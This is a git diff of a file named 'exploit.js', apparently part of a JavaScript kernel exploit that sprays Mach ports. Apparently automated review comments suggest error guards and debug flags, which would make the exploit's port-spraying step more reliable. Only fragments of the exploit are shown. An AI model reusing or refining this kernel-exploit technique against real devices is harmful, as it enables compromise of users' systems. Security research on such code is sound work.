Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-xsrc/js/kexp/exploit.js12
1 files changed, 8 insertions, 4 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 6a48f23..6992b6d 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -209,12 +209,14 @@ function spray_ports(number_port_descs) {
var mp = shit_heap(4);
- mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
- mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ var ret_ = mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
+ printf("mpa %d (%s)\n", ret_, mach_error_string(ret_));
+ ret_ = mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+ printf("mpir %d (%s)\n", ret_, mach_error_string(ret_));
- var ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
-// printf("%d (%s)\n", ret_, mach_error_string(ret_));
+ printf("sp %d (%s)\n", ret_, mach_error_string(ret_));
var ret = read_u32(mp);
shit_heap_free(mp);
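Review bot: The three new status values are only printed, never acted on, so a failed `mach_port_allocate` still falls through to `read_u32(mp)`, which then reads whatever the scratch buffer happened to hold and passes it on as a port name. A guard after each call would stop at the first failure, for example `if (ret_ !== 0) { shit_heap_free(mp); return 0; }`. How callers should see the failure is not visible here, because `spray_ports` starts and ends outside the hunk. The tags `mpa`, `mpir` and `sp` are also cryptic and the `printf` calls are unconditional; spelling out the call name and putting them behind a debug flag would keep normal runs quiet. Finally, `ret_` next to `ret` is easy to misread, and a name such as `kr` for the status would separate the two.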
@@ -452,6 +454,8 @@ again: while (true) {
release_port_ptrs(read_u32(fp + (i << 2)));
}
+ return;
+
var arrmpt = shit_heap(8);
write_u32(arrmpt, 0);
write_u32(arrmpt + 4, 0);
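Review bot: The bare `return;` added after the release loop makes everything below it in this function unreachable, starting with the `arrmpt` allocation. Nothing in the change says whether this is a temporary debugging cut or the intended new end of the function. If it is temporary, mark it, e.g. `return; // TEMP: stop after releasing ports while debugging`. If it is permanent, delete the dead code below instead of leaving it behind an early return. The enclosing function and the `again:` loop start outside the hunk, so whether this return sits inside or after that loop cannot be confirmed from here.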